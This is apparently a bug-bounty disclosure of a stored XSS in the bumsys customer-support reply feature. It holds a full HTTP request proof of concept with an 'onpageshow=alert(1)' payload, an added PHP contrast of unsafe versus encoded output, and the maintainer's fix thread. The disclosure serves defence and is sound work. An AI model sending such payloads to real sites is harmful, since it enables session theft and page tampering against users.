Stored XSS in Customer Support in unilogies/bumsys

Valid

Reported on

Feb 22nd 2023


Description

An attacker can send an XSS payload in Customer Support.

Proof of Concept

Request Payload:
POST /xhr/?module=customer-support&page=addCaseReply HTTP/1.1
Host: demo.bumsys.org
Cookie: __80e72166c3164cd4e1f55b5348364ee4f8bc0d12=655mqrm2v9uhktlqpke0h026d4; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: bfbfb6c2834e8b91b86a883cd6c2b4cf18d8ad65
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3828905606458425251363531674
Content-Length: 570
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/customer-support/case-list/?case_id=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseReply"

<h1>test</h1><body onpageshow=alert(1)>
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="replyMode"

Public
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="case_id"

2
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseType"

Refund Request
-----------------------------3828905606458425251363531674--


Response:
HTML Injection and XSS alert

Impact

An XSS vulnerability can allow attackers to steal cookies, create a keylogger, change the integrity of the page, etc.
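Added example, not part of the original report and not the bumsys code or its fix: a PHP illustration of why the stored caseReply value runs when it is echoed back as markup, and how encoding it for the HTML body context at output time renders it as inert text. The function names and the `case-reply` wrapper markup are assumptions made for the illustration.

```php
<?php
// Added illustration. Function names and wrapper markup are hypothetical,
// not taken from the bumsys code base.

// Constructed sample: the caseReply value from the request above,
// as it would be read back from storage when the case is viewed.
$storedReply = '<h1>test</h1><body onpageshow=alert(1)>';

// Vulnerable pattern: stored text is concatenated into the page as markup,
// so the browser parses the <h1> and the event-handler attribute.
function renderReplyUnsafe(string $reply): string
{
    return '<div class="case-reply">' . $reply . '</div>';
}

// Hardened pattern: encode at output time for the HTML body context.
// ENT_QUOTES also covers attribute contexts; ENT_SUBSTITUTE replaces
// invalid UTF-8 instead of returning an empty string.
function renderReplySafe(string $reply): string
{
    $encoded = htmlspecialchars($reply, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    // nl2br runs after encoding, so the only tags it adds are its own <br>.
    return '<div class="case-reply">' . nl2br($encoded, false) . '</div>';
}

// Regression check: once the wrapper and the <br> tags are removed,
// any remaining angle bracket means user text reached the page as markup.
function hasInjectedMarkup(string $rendered): bool
{
    $inner = preg_replace('#^<div class="case-reply">|</div>$#', '', $rendered);
    $inner = str_replace('<br>', '', $inner);
    return strpbrk($inner, '<>') !== false;
}

$outputs = [
    'unsafe' => renderReplyUnsafe($storedReply),
    'safe'   => renderReplySafe($storedReply),
];

foreach ($outputs as $name => $html) {
    printf("%-6s injected_markup=%s  %s\n", $name, hasInjectedMarkup($html) ? 'yes' : 'no', $html);
}
```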

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 3 months ago
Khurshid Alam validated this vulnerability 3 months ago

@hatlesswizard, Good finding. We will fix the issue soon. Thank you

hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
hatlesswizard
3 months ago

Researcher


Can you assign a CVE please? It would be very nice

Khurshid Alam marked this as fixed in v2.0.1 with commit 927214 3 months ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability 3 months ago
Khurshid Alam
3 months ago

Maintainer


@admin, please assign a CVE.

hatlesswizard
3 months ago

Researcher


@kmkalam24 Can you please assign a CVE?

hatlesswizard
3 months ago

Researcher


Ohh sorry, texted at the same time

Ben Harvie
3 months ago

Admin


A CVE has now been assigned as requested :)

Khurshid Alam
3 months ago

Maintainer


Thank you

hatlesswizard
3 months ago

Researcher


Thanks Guys
